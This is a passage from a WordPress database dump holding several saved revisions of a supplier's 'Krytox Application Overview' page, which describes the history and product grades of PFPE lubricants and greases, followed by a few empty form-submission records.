colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 15:07:54', '2017-01-10 15:07:54', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3426, 2, '2017-01-10 15:09:18', '2017-01-10 15:09:18', '<pre style="text-align: center;">[share title=""]</pre>\r\n<h3 style="text-align: center;">Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 15:09:18', '2017-01-10 15:09:18', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3427, 2, '2017-01-10 15:10:34', '2017-01-10 15:10:34', '<h6 style="text-align: center;">[share title=""]</h6>\r\n<h3 style="text-align: center;">Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n<h2><span style="font-size: 75%;">Krytox Today</span></h2>\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<h3><span style="font-size: 85%;">Krytox Grades by Product:</span></h3>\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2017-01-10 15:10:34', '2017-01-10 15:10:34', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3428, 0, '2017-01-10 15:19:26', '2017-01-10 15:19:26', '', '', '', 'publish', 'closed', 'closed', '', '3428', '', '', '2017-01-10 15:19:26', '2017-01-10 15:19:26', '', 0, 'https://www.miller-stephenson.com/nf_sub/3428/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3429, 0, '2017-01-10 16:53:05', '2017-01-10 16:53:05', '', '', '', 'publish', 'closed', 'closed', '', '3429', '', '', '2017-01-10 16:53:05', '2017-01-10 16:53:05', '', 0, 'https://www.miller-stephenson.com/nf_sub/3429/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3430, 0, '2017-01-10 18:11:52', '2017-01-10 18:11:52', '', '', '', 'publish', 'closed', 'closed', '', '3430', '', '', '2017-01-10 18:11:53', '2017-01-10 18:11:53', '', 0, 'https://www.miller-stephenson.com/nf_sub/3430/', 0, 'nf_sub', '', 0); 
